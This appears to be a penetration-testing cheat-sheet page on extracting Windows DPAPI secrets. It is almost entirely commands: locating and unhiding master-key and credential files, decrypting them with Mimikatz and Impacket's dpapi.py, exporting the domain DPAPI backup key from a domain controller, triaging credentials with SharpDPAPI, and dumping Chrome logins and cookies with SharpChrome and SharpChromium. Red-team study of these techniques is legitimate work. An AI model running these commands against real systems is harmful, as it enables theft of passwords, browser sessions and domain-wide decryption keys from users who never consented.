Master keys locations (hidden files, need -Force):
Copy PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\) Credential files locations (hidden files, need -Force):
Copy PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\) Unhide files:
Copy PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff" Mimikatz
Decrypt manually offline with known plaintext password:
Copy mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff Impacket
Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs:
Copy $ dpapi.py backupkeys --export -k -no-pass -t DC01.megacorp.local
$ dpapi.py masterkey -file ./Users/Administrator/AppData/Roaming/Microsoft/Protect/<SID>/00ff00ff-00ff-00ff-00ff-00ff00ff00ff -pvk 'G$BCKUPKEY_<GUID>.pvk
$ dpapi.py credential -file ./Users/Administrator/AppData/Roaming/Microsoft/Credentials/00ff00ff00ff00ff00ff00ff00ff00ff -key 0x<HEX_MASTER_KEY> SharpDPAPI
Triage user's credentials , vaults , rdg and certificates :
Copy PS > .\SharpDPAPI.exe triage /password:Passw0rd! Triage machine's credentials (machinecredentials ), vaults (machinevaults ) and certificates (certificates /machine ):
Copy PS > .\SharpDPAPI.exe machinetriage Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs for any user in the domain with it (needs DA privileges):
Copy PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
PS > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local] SharpChrome
Copy PS > .\SharpChrome.exe logins|cookies [/pvk:key.pvk] SharpChromium
Copy PS > ls "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
PS > .\SharpChromium.exe logins
PS > .\SharpChromium.exe cookies Tools
Last updated 7 months ago
